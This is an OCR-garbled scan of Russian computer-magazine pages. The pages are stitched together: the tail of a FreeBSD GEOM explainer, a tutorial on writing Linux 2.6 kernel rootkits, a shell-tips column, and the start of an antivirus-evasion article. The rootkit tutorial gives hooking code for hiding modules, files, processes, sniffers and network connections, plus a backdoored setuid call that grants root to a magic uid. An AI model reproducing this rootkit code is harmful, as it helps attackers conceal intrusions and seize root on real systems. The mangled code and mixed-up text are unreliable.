с АТА-диском, разбитым на 2 слайса, у эк- 
земпляра класса МВВ будет 2 поставщика 
(представленные файлами/беѵ/асІОзІ 
и/беѵ/асІ0з2). Экземпляр другого класса под- 
ключается к поставщику через потребитель, 
образуя цепь, по которой будут проходить 
запросы ввода-вывода. 

Работу механизма ОЕОМ гораздо проще 
понять на примере, чем изучая голую теорию 
и представляя себе якорные цепи сухогрузов. 
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> Стандартная топология ОЕОМ 



На рисунке изображена стандартная топо- 
логия ОЕОМ: АТА-диск, разбитый на 2 слай- 
са; один из слайсов разбит на 2 раздела. 

В начале цепи находится экземпляр класса 
сіізк, который напрямую взаимодействует 
с драйвером АТА-контроллера. К его пос- 
тавщику подключены экземпляры классов 
тЬги беѵ. Первый делит диск на 2 слайса, 
сверяясь с таблицей разделов, располо- 
женной в секторе МВВ. Второй помещает 
файл устройства (абО) в каталог /беѵ. 
Экземпляр класса тЬг имеет 2 поставщика 
по количеству слайсов. К первому подклю- 
чены экземпляры классов Ьзб и беѵ. Второй 
слайс не является ВЗЭ-слайсом, поэтому 
к нему подключен только беѵ. Экземпляр 
класса Ьзб делит слайс абОзІ на 2 раздела 
и поэтому также имеет 2 поставщика. К каж- 
дому из них подключены экземпляры класса 
беѵ, которые создают специальные файлы 



/беѵ/абОзІ и/беѵ/аб0з2и замыкают цепь. 
Рассмотрим, как происходит чтение 
блоков данных, запрашиваемых файловой 
системой. Ситуация такая: на разделе /беѵ/ 
абОзІ а создана ФС, она запрашивает пятый 
блок раздела. Что же при этом происходит? 
Экземпляр класса Ьзб знает только ограни- 
ченный объем информации — то, что некое 
адресное пространство (он и понятия не 
имеет, что это один из слайсов диска), пред- 
ставленное поставщиком экземпляра клас- 
са, расположенного на одно звено ниже, 
разделено на 2 раздела. Эту информацию 
он берет из заголовка, находящегося в на- 
чале адресного пространства. Обязанность 
экземпляра класса Ьзб — правильно вычис- 
лить смещение, чтобы попасть именно в тот 
блок, который запрашивает ФС. Чтобы это 
сделать, необходимо сложить смещение 
от начала раздела и номер блока. Раздел, 
с которого ФС запрашивает блок, является 
первым, поэтому в результате получается 
опять же пятый блок. Экземпляр класса Ьзб 
отправляет запрос на чтение пятого блока 
ниже. Экземпляр тЬг, который точно так же 
видит ниже только адресное пространство, 
получает запрос, подвергает его обработке 
и отправляет запрос еще ниже — постав- 
щику бізк, который направляет запрос 
драйверу АТА-контроллера. В результате 
файловая система получает именно 
тот который который, какой и заказывала. 
На самом деле, конечно же, все сложнее 
(при вычислении адреса класс должен 
учитывать заголовки, пересчитывать раз- 
меры блоков и тому подобное), но не будем 
вдаваться в подробности. 

Отдельные классы механизма ОЕОМ очень 
ограничены в «знаниях» о друг друге. 
Информация, представляемая поставщика- 
ми, сводится лишь к данным об имени, раз- 
мере сектора и общего размера адресного 
пространства. Отсутствие перекрестных 
ссылок между классами и общая немно- 
гословность каждого из них делает ОЕОМ 
очень гибким, не привязанным к конкретной 
топологии, механизмом. Чтобы получить 
возможность работы с разделами Арріе, 
достаточно заменить экземпляр класса 
тЬг на экземпляр класса арріе. А чтобы 
задействовать шифрование, достаточно 
подключить экземпляр шифрующего класса 
к любому поставщику. ОЕОМ безразлич- 
но, каким образом будут распределены 
экземпляры классов, но некоторые классы 
откажутся инициализироваться, если не 
будут соблюдены определенные условия. 
Например, класс тЬг требует наличия в ад- 
ресном пространстве валидной метки МБР, 
и в случае ее отсутствия экземпляр не будет 
включен в цепь. 
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СКРЫВАЕМ МОДУЛИ, ФАЙЛЫ, 

ПРОЦЕССЫ И СЕТЕВЫЕ СОЕДИНЕНИЯ В ЫЫЦХ 2.6.Х 
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РУТКИТЫ ПОДРАЗДЕЛЯЮТ НАЯДЕРНЫЕ (УРОВНЯ ЯДРА) И НЕЯДЕРНЫЕ (ПРОСТРАНСТВА ПОЛЬЗОВАТЕЛЯ). НЕЯДЕРНЫЕ РУТ- 
КИТЫ СОСТОЯТ ИЗ МНОЖЕСТВА ТРОЯНСКИХ ВЕРСИЙ ИСПОЛНЯЕМЫХ СИСТЕМНЫХ ФАЙЛОВ: Ь5, Р5, РІЫЮ, ІРСОЫРІО, ЫЕТЗТАТ, 
ЗУЗЬООО ИТ.Д. ПОСЛЕ ПОДМЕНЫ СИСТЕМНЫХ ПРОГРАММ И ДЕМОНОВ ТРОЯНСКИМИ ВЕРСИЯМИ, ОНИ НЕ БУДУТ ОТОБРАЖАТЬ 
ХАКЕРСКИЕ ПРОЦЕССЫ, ФАЙЛЫ, УСТАНОВЛЕННЫЕ СОЕДИНЕНИЯ И Т.Д.ЯДЕРНЫЕ РУТКИТЫ ПРЕДСТАВЛЯЮТ СОБОЙ ОДИН ИЛИ 
НЕСКОЛЬКО МОДУЛЕЙ ЯДРА (ЬКМ), КОТОРЫЕ УСТАНАВЛИВАЮТСЯ В НЕГО И ВЫПОЛНЯЮТ ВСЕ ДЕЙСТВИЯ ПО СОКРЫТИЮ СЛЕДОВ 
ХАКЕРА. СЕГОДНЯ МЫ НАУЧИМСЯ ПИСАТЬ ЯДЕРНЫЕ РУТКИТЫ, ПРИЧЕМ ПОД САМЫЕ ПОСЛЕДНИЕ ВЕРСИИ ЯДРА ЫІ\ІІІХ2.6.Х. 



□ Что должен делать руткит 

иже перечислен стандартный 
набор возможностей, которые 
должен поддерживать любой 
полноценный ядерный руткит: 

• ЕНгіе ИгеІГ (скрытие самого себя). Модуль не 
появляется в списке загруженных модулей, 
выдаваемых командой Ізтоб. Если хакер не 
скроет его, то администратор рано или позд- 
но обнаружит посторонний модуль в системе 
и удалит его командой гттосі. 

• Рііе Ні сіег (скрытие файлов). Хакер может ус- 
тановить какие-нибудь программы (снифер, 
кейлоггер, бэкдор и пр.), которые с помощью 
этой возможности руткита не будут обнаружи- 
ваться в файловой системе. 

• &ігес*огу Нігіег (скрытие каталогов). Хакер 
может хранить нужные ему файлы в отдель 
ном каталоге. С помощью этой возможности 
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скрывается сразу весь каталог вместе с 
файлами. 

• Ргосегг Нігіег (скрытие процессов). 

Подобно скрытию файлов и каталогов, руткит 
не дает отображать верную информацию 

о запущенных процессах, выдаваемую коман- 
дой рз. 

• ЗпіГГег Нігіег (скрытие работающего снифе- 
ра). Руткит подавляет флаг РРОМІЗС (не- 
разборчивый режим), выводимый утилитой 
іТсопТід, позволяя тем самым скрыть в системе 
работу снифера. 

• НісИпд Ггот пе+г+аі: (скрытие информации 
от утилиты пеізіаі). Руткит позволяет скрыть 
информацию об открытых портах и установ- 
ленных соединениях, выдаваемую утилитой 
пеізіаі. 

• Зе+иігі Тгсу-эп (троянская версия вызова 
зеіиісі). Автоматически предоставляет пользо- 



вателю с ЫЮ=<магический номер> доступ с 
правами гооГ 

Для удобства и большей ясности мы рассмот- 
рим реализацию каждой из перечисленных 
возможностей отдельно, в виде независимых 
модулей. Однако в действительности в рут- 
китах все возможности обычно компануются 
в один общий модуль, и после его загрузки в 
ядро хакер может вызывать нужную возмож- 
ность из командной строки. Для удобства 
передачи команд руткиту в его состав обычно 
входиттак называемый управляющий файл, 
которому передаются команды в командной 
строке. Этот управляющий файл совсем не 
обязательно является реальным файлом, 
хранящимся на жестком диске, — он может 
находиться в памяти по сути являясь псев- 
дофайлом. В самом рутките (обычно в пере- 
хваченном вызове ехесѵе()) осуществляется 
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> Сайтавтора руткита ІпІоХопіа (на русском языке) 




> На сайте ѵѵ\лл/ѵш5і5есигіЫпіо расположена статья 
«Защита от исполнения в стеке (ОС Линукс)» россий- 
ского хакера сіеѵОісі 



проверка параметра Лепате, и если он равен названию 
псевдофайла, то исполняется код, находящийся в модуле 
ядра. 

Я изучил исходные коды многих известных ядерных рут- 
китов, таких как асіоге-пд, кпагк, ІпіоХопіа, Ікт ігоіап (ищи 
их все на 0\Ю к журналу). Многие идеи и участки кода я 
заимствовал именно из этих руткитов. 

Если ты не знаком с программированием модулей ядра 
Ыпих, то настоятельно советую почитать соответству- 
ющую литературу, например «Тііе Ыпих КегпеІ Мосіиіе 
Ргодгаттіпд Оиісіе» ( ѵѵѵѵѵѵ.іісір.ога і По адресу ѵѵѵѵѵѵ. 
ореппеі.ги/сІосз/РЦЗ/Іктрд26 расположен перевод этого 
руководства на русский язык. 

Самый большой недостаток всех ядерных руткитов заклю- 
чается в том, что программисты ядер не обеспечивают об- 
ратную совместимость, в результате чего модульный код, 
написанный для одной версии ядра, может не работать в 
другой версии. Например, код для ядра 2.6.0 может уже не 
работать в версии 2.6. 1 2 и тем более — в версии 2.4.2. По- 
этому для гарантии работы руткитов их нужно тестировать 
на различных версиях ядер. Я тестировал все примеры 
только на ядре 2.6. 1 2 в Мапсігіѵа 2006 РоѵѵегРаск. 

□ Таблица системных вызовов 

Начиная с ядер версии 2.5.41 , официальные разработчи- 
ки «сделали финт ушами», установив запрет на экспорт 
таблицы системных вызовов зуз_саІИаЫе, в результате 
чего простая подмена системных вызовов, которая 
использовалась в руткитах под более ранние ядра, в этих 
ядрах не работает. Но хакерами были найдены способы 
получения адреса зуз_саІНаЫе. 

Первый способ. Он описан в электронном журнале Ріігаск 
#58 в статье « І_іпих оп4Ие-Пу кегпеі раісбіпд ѵѵііНоиі І_КМ » . 
Он зависит от текущей платформы и алгоритмически 
сложен. 

Второй способ. Адрес таблицы можно найти простым 
поиском в файле /Ьооі/Зузіет. тар, например: 

# дгер зуз_са11_і.аЫе /Ъооб/Зузбет.тар 
с03се760 Ц зуз_са11_1:аЫе 



* (Іопд *) &зуз_са11_ЬаЫе=0хс03се760; 

И далее осуществлять подмену обычным образом, как в 
ядрах версии 2.4.x. В своем модуле ты можешь встроить 
функцию, которая открывала бы файл /ЬооѴЗузіет.тар и 
самостоятельно находила в нем адрес зуз_саІИаЫе. 
Третий способ. Его придумал и описал (с исходным кодом) 
в статье «Защита от исполнения в стеке (ОС Линукс)» рос- 
сийский хакер сіеѵОісі из ІІкР Зесигііу Теат. Ищи эту статью 
на ѵѵѵѵѵѵ.изізесигііѵ.іпіо. 

Далее во всех модулях, где требуется подмена вызовов, мы 
задействуем способ сіеѵОісі. Ниже показана функция из его 
статьи, которая самостоятельно находит адрес таблицы 
системных вызовов. Ее мы и будем использовать. 



ѵоісі ііпсі зуз саіі ГаЫе (ѵоісі) 

И 

ипзідпесі Іопд агг [ 4 ] , *ррг; 
іпР і; 

/* получаем указатель на конец секции кода */ 
рбг = (ипзідпесі Іопд *) ( (іпіР_тш. епсі_сосіе + 4) 

& Охіііііііс) ; 

/* начинаем поиск до конца секции данных */ 
ѵііііе (рЩ < іпіР_тш. епбщЗаба) { 

/* если нашли адрес зуз_с1озе */ 
іі (*ррг == (ипзідпесі Іопд *)зуз_с1озе) { 

Тог (і = 0; і < 4; і++) { 
агг [ і ] = * (рТг + і ) ; 

агг[і] = (агг[і] » 16) & ОхООООТТТі; 

і 

/* действительно ли адрес в таблице */ 
іі (агг [ 0 ] ! = агг [2 ] || агг[1] !=агг[3]) 



I 

вызовов 



/* находим адрес таблицы системных 

ѵ 

зуз_са11_ЬаЫе = (рбг — _ЫК_с1озе) ; 
Ьгеак; 



I 

рТг++ ; 



Теперь в модуле можно сделать присваивания следующе- } 
го вида: 

Чтобы данная функция заработала, необходимо также 
ипзідпесі іопд *зуз_са!1_ТаЫе; определить глобальную переменную: 




> Домашняя страница 
руткита ІпіоХопіа: ІтДр:// 
заіапіс.еазѵсосііпа.ога. 
Руткиты асіоге-пд, кпагк 
и Ікт ігоіап в настоящее 
время в интернете мож- 
но найти только на ІтДр:// 
раскеізіогтзесигііѵ.ога. 




> На ЛѴЛ лежат все 
рассмотренные в 
статье модули ядра 
Ыпих, а также ядерные 
руткиты асіоге-пд, кпагк, 
ІпіоХопіаи ІкгтЦгоіап. 



> В моей книге «Про- 
граммирование боевого 
софта под Ыпих» ты 
сможешь найти более 
подробную информа- 
цию о программиро- 
вании руткитов под 
Ііпих-ядра версии 2.6.x и 
много других интерес- 
ных вещей. 
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«САМЫЙ БОЛЬШОЙ НЕДОСТАТОК 
ВСЕХ ЯДЕРНЫХ РУТКИТОВ ЗА- 
КЛЮЧАЕТСЯ В ТОМ, ЧТО ПРОГРАМ- 
МИСТЫ ЯДЕР НЕ ОБЕСПЕЧИВАЮТ 
ОБРАТНУЮ СОВМЕСТИМОСТЬ, В РЕ- 
ЗУЛЬТАТЕ ЧЕГО МОДУЛЬНЫЙ КОД, 
НАПИСАННЫЙ ДЛЯ ОДНОЙ ВЕРСИИ 
ЯДРА, МОЖЕТ НЕ РАБОТАТЬ В ДРУ- 
ГОЙ ВЕРСИИ» 



ипзідпеб Іопд *зуз_са11_ДаЫе; 

О Компиляция модулей ядер 2.6.x 

Компиляция модулей ядер 2.6.x существенно 
отличается от компиляции модулей в 
ядрах 2. 4.x. Сначала необходимо создать 
МакеЛІе со следующим содержимым (в 
качестве примера возьмем модуль с назва- 
нием тосі.с): 

оЬд -т += тоб. о 

Затем нужно выполнить команду для сборки 
модуля следующего вида: 

# таке -С /изг/згс/ііпих- 4 ипате -г' 
ЗиВБІКЗ=$РШЗ тобиіез 

В том случае если у тебя в каталоге /изг/згс 
присутствует символическая ссылка Ііпих на 
каталог с исходными текстами ядра, команда 
сборки будет выглядеть так: 

# таке -С /изг/згс/ііпих ЗІІВЦІКЗ=$Р1лЮ 
тобиіез 

Как ты понимаешь, исходные тексты ядра 
должны быть установлены в твоей системе 
в каталог /изг/згс. Если исходные коды ядра 
у тебя отсутствуют, то их нужно установить, 
иначе сборка модуля закончится с ошибкой. 
Устанавливать пакеты удобно через КОЕ или 
Споте (ищи в меню функцию вроде «Уста- 
новка программ»), Нужный пакете исходными 
кодами ядра обычно имеет название вида 
кегпеІ-зоигсе-номер_версии. 

В результате выполнения команды в текущем 



каталоге образуется объектный файл модуля 
тосі.ко. Обрати внимание: в ядрах 2.6 объект- 
ные файлы модулей имеют расширение 
.ко, а не .о. Теперь модуль можно загрузить в 
ядро командой: 

# іпзтоб тоб. ко 

Просмотреть список установленных модулей 
можно командой ІзтосІ, а удалить модуль 
— командой гттосі (здесь имя модуля указы- 
вается без расширения): 

# гттоб тоб 

Далее все модули компилировать следует 
именно так, разумеется, подставляя каждый 
раз новые названия модулей в МакеЛІе. 

□ Скрытие модуля 

С помощью утилиты зігасе мы можем узнать, 
какие вызовы задействует команда Ізтоб в 
своей работе: 



# зДгасе Ізтоб 



|бреп ("/ргос/тобиіез" , О КБСЖЪУ) = б 


геаб (б, " 


Ъ.ібе тобиіе 2440 0 - Ъіѵе 


ОхбОбЪ" . , 


. . , 1024) = 1024 


йгіДе (1, 


"Дібе тобиіе 2440 0 


33) 


= 33 



Как видим, вызовом геаб читается строка из 
файла/ргос/тобиіез, а затем при помощи 
вызова ѵѵгііе она выводится на экран. Поэтому 
в модуле мы просто подменяем вызов ѵѵгііе 
(можно подменить геаб) и выполняем провер- 
ку на выполнение команды Ізтоб. Затем ищем 



в буфере имя нашего модуля и в случае его 
обнаружения просто возвращаем управле- 
ние, в результате чего информация о модуле 
не выводится. Ниже показан отрывок из моду- 
ля, полный его исходный код фібе_тобиІе.с) 
ищи на ЭѴЭ к журналу: 

іпД пеіл/_мгіДе (іпД Дб, сопзД сДаг* 

ЪиД, зіге_Д соипД) 

I 

с Да г *Детр; 
іпД геД; 

/* если выполнена команда Ізтоб */ 

ІД ( ! зДгстр (сиггепД->сотт, 

"Ізтоб")) { 

/* выделяем память в пространстве 
ядра и копируем в нее содержимое буфе- 
ра ЪиД */ 

Детр = (сДаг * ) ктаііос (соипД + 1, 
СРР_КЕКЫЕЪ) ; 

сору_Д гот _изег ( Детр, ЪиД, соипД); 
Детр [соипД + 1] = ' \0'; 

/* если содержится имя нашего мо- 
дуля */ 

ІД (зДгзДг (Детр, МООІІДЕ_ЫАМЕ) ! = 
■ИМ— 

/* освобождаем буфер в куче и воз- 
вращаем результат */ 
кДгее (Детр) ; 
геДигп соипД; 

■ 

■ 

/* выполняем оригинальный вызов */ 
геД = огід_ѵ/гіДе ( Дб, ЪиД, соипД) ; 
геДигп геД; 

} 

Однако этот способ не позволяет скрыть 
модуль от простого просмотра содержимого 
файла/ргос/тобиіез, в котором находятся 
имена всех загруженных модулей. Конечно, мы 
можем по аналогии сделать дополнительные 
проверки и удалять информацию о нашем 
модуле при выводе информации. Но здесь 
сложность заключается в том, что просмотр 
выполняется множеством способов, например 
командой саі/ргос/тобиіез или бб іТ=/ргос/ 
тобиіез Ьз=1 , атакже в МібпідІтіСоттапбег 
при помощи клавиши <РЗ> или <Е4>. 

□ Скрытие файлов 

Содержимое директории считывается 
системным вызовом деібепіз64 (или просто 
деібепіз, в зависимости от версии ядра). Это 
можно узнать при помощи утилиты зігасе. 

Этот вызов использует функция геаббіг(), 
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> Загруженный в ядро модуль 
Ысіе_тосіиІе.ко не отображается 
в списке модулей 



которая читает содержимое директорий. Ре- 
зультат деісІепіз64 сохраняется в виде списка 
структур зігисі бігепЦ а сам вызов возвращает 
длину всех записей в каталоге: 

зігисі бігепі64 { 
іпі б_іпо1, б_іпо2; 
іпі б_оі:і:1, сі_о^^2; 
ипзідпесі зііогі б_гес1еп; 
ипзідпесі сііаг сі_іуре; 
сіаг сі_паше [0] ; 

} *бігр2, *бігрЗ; 

Нам интересны 2 поля этой структуры: 
сІ_гесІеп (размер записи) и сІ_пате (имя 
файла). Таким образом, для того чтобы 
спрятать запись о файле, нам достаточно 
подменить вызов деібепіз64, затем отыскать 
в списке полученных структур соответству- 
ющую запись и удалить ее. Исходный код 
ІпісІе_ТіІе.с с комментариями ищи на 0\ЛЭ. 
После сборки модуля и его загрузки в ядро ты 
увидишь, что указанный файл не отобража- 
ется ни командой Із, ни файловым менедже- 
ром. При этом, зная имя скрытого файла, ты 
легко можешь осуществить над ним любые 
операции. 

□ Скрытие каталогов и процессов 

Для скрытия каталогов и процессов можно 
задействовать один и тот же метод. Я прочел 
о нем в статье «ЗиЬ ргос_гооі Оиапсіо Зитиз 
(Абѵапсез іп КегпеІ Наскіпд)» из Ріігаск 
#58 — 06. В этом методе не требуется пере- 
хватывать системные вызовы. Суть его заклю- 
чается в том, что Ыпих-устройства и каталоги 
могут рассматриваться как файлы. Каждый 



файл (каталог, устройство) представлен в 
ядре структурой Іііе. Она содержит поле і_ор, 
которое, в свою очередь, указывает на струк- 
туру ііІе_орегаііопз. Последняя используется 
для хранения указателей на функции, произ- 
водящие различные стандартные операции 
с файлом, такие как геаб(), \/ѵгііе(), геаббіг(), 
іосіІ() и т.д. Определения обеих структур — Іііе 
и ііІе_орегаііопз — ты можешь увидеть в фай- 
ле ІіпихДз.И. Если в структуре ііІе_орегаііопз 
подменить указатели на функции или подста- 
вить вместо них ШІ_І_ (это будет означать, что 
данная функция не реализована), то можно 
изменить поведение конкретного файла 
(каталога, устройства). Так как нам требуется 
скрывать каталоги, то удобнее всего подме- 
нить указатель на функцию геаббіг(), который 
представлен в структуре ііІе_орегаііопз 
следующим образом: 

іпі (*геабсііг) (зігисі іііе *, ѵоіб *, 
й.11сііг_і) ; 

Функция геаббіг() реализует системные 
вызовы геаббіг(2) и деібепіз(2) для каталогов 
и игнорируется для обычных файлов. 

Мы можем подставить вместо указателя 
ШІ_І_, но тогда вообще не будут отображать- 
ся никакие каталоги. В рутките же требуется 
прятать только отдельные каталоги, поэтому 
мы будем подменять этот указатель ука- 
зателем на свою функцию, которая будет 
отслеживать заданный каталог. 

Вспомним, что файловая система/ргос 
содержит по одному каталогу для каждого вы- 
полняющегося процесса. Именем каталога 
является идентификатор процесса. Каталоги 
появляются и исчезают по мере запуска и 
завершения процессов. В каждом каталоге 
имеются файлы, содержащие различную ин- 
формацию о процессе. Таким образом, если 
скрыть каталог в файловой системе /ргос с 
именем нужного нам процесса, то он не будет 
отображаться командами рз, іор и пр. Именно 
поэтому метод скрытия каталогов одновре- 
менно позволяет нам скрывать процессы в 
системе. Разумеется, этот метод позволяет 
скрывать не только каталоги, но и любые 
другие файлы, в том числе устройства. 

Чтобы получить указатель на структуру іііе 
необходимо открыть файл (каталог, устройс- 
тво). В ядре открытие файла осуществляется 
с помощью функции ііІр_ореп(). Удобнее 
открывать корневой каталог для последую- 
щего скрытия в нем нужных файлов (ката- 
логов, устройств). Для указания корневого 
каталога в нашем модуле введена константа 



ОІРЕСТОРУ_РООТ. Для скрытия каталогов 
в файловой системе /ргос нужно присвоить 
константе имя «/ргос», а для скрытия файлов 
вне системы /ргос указываем корневой ката- 
лог. Причина, по которой требуется указывать 
разные корневые каталоги, заключается в 
том, что /ргос является особой файловой сис- 
темой, которая хранится в памяти компьютера 
и не связана с жестким диском. Поэтому если 
открыть корневой каталог, то мы не сможем 
прятать каталоги в файловой системе /ргос, и 
наоборот. 

В модуле мы подменяем не только указатель 
на функцию геабсІіг(), но и указатель на ТіІІсІіг- 
функцию, который стоит третьим аргументом 
в функции геабсІіг(). В подменной ТіІІсІіг-фун- 
кции мы делаем проверку на имя каталога, 
который требуется скрыть, и как только он 
будет обнаружен, Шсііг-функция вернет 0, 
в результате чего геабсІіг() пропустит этот 
каталог. Имя обычного файла, каталога или 
устройства для скрытия указывается в опре- 
делении ОІВЕСТОВУ_НЮЕ. 

В ходе экспериментов я выяснил, что имена 
каталогов хранятся в системе как строки 
без оканчивающего нулевого символа, в то 
время как имена обычных файлов хранятся с 
оканчивающим нулевым символом. Поэтому 
мы для сравнения строк в модуле задействуем 
функцию зІгпстрО, которая осуществляет 
проверку только п-первых символов. Соот- 
ветственно, нам под силу передавать строки 
без завершающего нулевого символа. 

□ Скрытие работающего снифера 

Чтобы подавить флаг РРЮМІЗС, можно 
просто подменить системный вызов іос!І(), 
в котором будем выполнять проверку на 
установленный флаг, и менять его значение 
на обратное: 

іпі: пем_іосіі (іпі: іб, іпі: гедиезі, 
ипзідпесі Іопд агд) 

I 

Ш 

іі (гедиезі == ЗІОССІЕЕЪАСЗ) { 
іі (ргошізс) 

ііг->ііг_Падз |= ІЕЕ_РКОМІЗС; 
еізе 

ііг->ііг_і1адз & = ~ІЕЕ_РКОМІЗС; 

I 

геіигп 0; 

> 

□ Скрытие информации от утилиты пеізіаі 

Утилита пеізіаі читает информацию из фай- 
лов /ргос/пеі/{іср,исІр} и других файлов (их 
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> Код модуля, скрывающего каталоги и 
процессы 




> После загрузки модуля Ьісіе_ЛІе.ко в ядро файл ІезНіІе не отобра- 
жается командой І5 -а, но доступ к нему возможен (в примере мы 
выводим его содержимое командой саі) 



«После сборки модуля и его загруз- 
ки в ядро ты увидишь, что указанный 
файл не отображается ни командой 
І5, ни файловым менеджером. При 
этом, зная имя скрытого файла, ты 
легко можешь осуществить над ним 
любые операции» 



список можно увидеть в тап пеізіаі). Поэтому 
если скрыть нужные строки с информацией о 
соединении и об открытых портах при чтении 
из этих файлов, то пеізіаі не будет отображать 
их на экране. 

Однако мы рассмотрим другой способ, ко- 
торый используется в рутките абоге-пд. Суть 
этого способа заключается в подмене указа- 
теля на функцию іср4_зед_зНо\л/() в структуре 
іср_зед_аііпіо (определена в файле пеіДср. 
б). Эту функцию задействует в своей работе 
утилита пеізіаі. В подмененной функции 
НаскесНср4_зед_зНо\л/() мы вызываем функ- 
цию зігпзіг() для поиска в зец->ЬиІ подстроки, 
содержащей шестнадцатеричный номер 
порта, который мы указали для скрытия: 

іпі ііаскеб_Ьср4_зед_зікш (зігисі 
зед_іі1е *зед, ѵоіб *ѵ) 



I 

сііаг рогі [12] ; 
іпР геіѵаі; 

геіѵаі = огід_Ьср4_зед_з1ісш (зед, 

т 

зргіпіі (рогі, "%04Х", РОКТ_ТО_ 

іУгіД 

іі (зігпзіг (зед->Ьи! + зед->соипі 
- ТМР52, рогр , ТМР52 ) ) 
зед->соипР -= ТМР52 ; 
геіигп геіѵаі; 

I 

□ Троянская версия вызова зеіиісі 

Системный вызов зеіиіб всегда исполь- 
зуется при входе и при регистрации пользо- 
вателя в системе. Руткит перехватывает этот 
вызов и заменяет его своей версией. 

Новая функция (я назвал ее сНапде_зеіиіб) 
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будет проверять, с каким иіб был про- 
изведен системный вызов. Если это31337, 
то длятекущего пользователя (сиггепі) 
устанавливаются права гооі(О): 



іпі сЬапде зеіиібЩіб 1: иісі) 


{ 




і іГ (иісі == 31337) { 


сиггепі->иіб = 0; 


сиггепі->еиіб = 0; 


сиггеп1:->діб =0; 


сиггеп1:->едіб = 0; 


геіигп 0; 




■ 


геіигп (*огід зеіиіб) (иісі) ; 



I 

□ Другие фичи руткитов 

В статье мы рассмотрели все основные 
возможности, которые должен подде- 
рживать любой полноценный руткит, но 
существуют и другие. Например, руткит 
может поддерживать перенаправление 
системного вызова ехесѵе, когда при запуске 
одной команды вместо нее будет запуще- 
на другая. Иногда могут присутствовать 
защита файлов от удаления или запрет на 
исполнение программ, запрет на вход в 
каталог, подмена строк в файле при чтении, 
встроенный в ядро снифер паролей, регис- 
тратор нажатия клавиш и т.д. 

Но все эти дополнительные возможности 
ты теперь сможешь реализовать 
самостоятельно. И-Е 
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ЕВГЕНИЙ «Л М» ЗОБНИН 

/ Л М@Ы$Т.НІІ / 





Привет всем любителям быстрых и 
эффективных решений. Сегодня в нашей 
скромной, но полезной рубрике вновь 
много самых разных советов. Как и всегда, 
особое удовольствие от чтения получат 
поклонники командной строки. Для них 
приготовлено множество типсов по работе 
с файлами, созданию архивов и настройке 
шелла. Те, кто равнодушен к мигающему 
курсору и не любит стучать по клавиатуре, 
могут обратить внимание на разделы, пос- 
вященные бессмертным X ѴѴіпбоѵѵ и тс. 



ХѴѴіпсіоѵѵ 

Установить сглаженные ТТР-шрифты для 
эмулятора терминала (добавить строки в 
-/.ХбеіаиІІз). 

Дляхіегт: 

ХТегт*1оса1е: ігие 
ХТегт*іасеЫате: Ъисіба Сопзоіе: 
ріхе1зіге=14 
Для гхѵі 

Кхѵі*іопі: хіі:Ъисіба Сопзоіе: 
ріхе1зІ2е=14 

Показать все символы заданного шрифта: 
Віітар-шрифты: 

$ хіб -іп 8x16 
ТТР-шрифты: 

$ хіб -іа Агіаі 

Показать список доступных шрифтов: 

$ ХІЗІОПІ5 

Показать список доступных ТТР- и Туреі - 
шрифтов: 

$ іс-іізі 

Показать подробности какого-либо действия, 
производимого с окном: 

$ хеѵ 

Показать информацию об окне: 

$ хргор 

Обновить экран: 

$ хгеігезЪ. 



О ЗІіеІІ 



Установить комбинации 
Ьазб: 



клавиш в стиле ѵі для 



РІІѲ5 

Конвертировать табуляторы в пробелы: 
$ ехрапб Іііе .іхі 




Показать последние 1 0 команд: 

$ іс -1 -10 

Показать файлы, отсортировав список по 
дате модификации: 

$ 1 з -Рііг 



Очистить окно терминала при логине и выходе 
из шелла, 
баз б: 

эсЪо сіеаг > ~/.ЬазД _ Іодіг 
эсЪо сіеаг > ~/.ЪазЪ _ Іодоиі 
2з(і: 



есЬо сіеаг > ~/.2Іодіп 
есДо сіеаг > -/.гіодоиі 



Показать каталоги и отсортировать список 
по размеру: 

$ би -з | зогі -п 

РІайти файл, содержащий строку: 

$ йпб . -іуре і -ехес дгер -Н стро- 
ка \{\ } \; 



Місіпідііі Соттапсіег (тс) 

Отключить использование графических 
символов для рисования линий (это здорово 
скрашивает внешний вид тс, если в текущем 
шрифте нет графических символов): 

$ тс -а 

Найти файл в текущей панели: 

СІГІ+5 

Выделить файлы по маске: 

Сігі+'Ч" 

Снять выделение: 

Сіг1+ М - М 

Открыть окно справочника каталогов: 

Сіг1+/ 

Открыть окно поиска: 

Езс, ? 

Синхронизировать панели: 

Езс, о 

Поменять панели местами: 

Сігі+и 



Показать файлы, названия которых содер- 
жат непечатаемые символы: 

$ 1 з -Ь 

Показать непечатаемые символы в тексто- 
вом файле: 

$ саі -ѵ Іііе 

Найти файлы, с даты модификации кото- 
рых прошло более 7 дней: 

$ ііпб . -шііше +7 

Найти файлы с ЗІІЮ-битом: 

$ ііпб . /Ъіп -іуре і -регш -и=з 

Копировать каталоги, используя іаг 
(с сохранением прав, ссылок и т.д.): 

$ іаг -сі - . | (сб /ітр; іаг -хі -) 

Удалить все файлы, кроме одного: 

$ гш -і '1з -б *.іхі | дгер -ѵ ,А не- 
удалять .іхі' 

Показать строки, содержащиеся в бинар- 
ном файле: 

$ зігіпдз Іііе 
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ДИЛДО 

ДЛЯ АНТИВИРУСА 



УПРАВЛЕНИЕ СЕРВИСАМИ ЧЕРЕЗ МЕНЕДЖЕР ѴѴІЫ00ѴѴ5 



«ТЕ8ТЕ0 ОМ ОВ. ѴІ/ЕВ» 
«ТЕ8ТЕ0 (Ш ОВ. ѴѴЕВ» 



БУКВАЛЬНО ВЧ ЕРА Я УВИДЕЛ В ИНТЕРНЕТЕ ИНТЕРЕСНУЮ НОВОСТЬОТОМ, ЧТО ПОЯВИЛАСЬ ЗЛО-ПРОГРАММА, КОТОРАЯ 
ПОСЛЕ ЗАРАЖЕНИЯ КОМПА СКАЧИВАЕТ ПИРАТСКУЮ ВЕРСИЮ «АНТИВИРУСА КАСПЕРСКОГО» И С ЕЕ ПОМОЩЬЮ УНИЧТОЖАЕТ 
ВСЕХ КОНКУРЕНТОВ. ОРИГИНАЛЬНОЕ РЕШЕНИЕ :]. МЫ МНОГО РАЗ СЛЫШАЛИ О ТОМ, ЧТО ВИРУСЫ ПЫТАЮТСЯ ОБМАНУТЬ 
АНТИВИРУСЫ, НО ТАКАЯ СТРАННАЯ ДРУЖБА НА МОЕЙ ПАМЯТИ ПРОИСХОДИТ ВПЕРВЫЕ. ЭТА НОВОСТЬ ПОДВИПЛА МЕНЯ 
НА РАЗ ПОВОР О ТОМ, КАК МОЖНО ОБМАНУТЬ АНТИВИРУС. ЛАРЧИК-ТО ДОСТАТОЧНО ПРОСТО ОТКРЫТЬ (ТОЧНЕЕ, ЗАКРЫТЬ ;]. 



□ ногие хакеры стремятся 

написать такой код вируса, 
трояна или другого зла, чтобы 
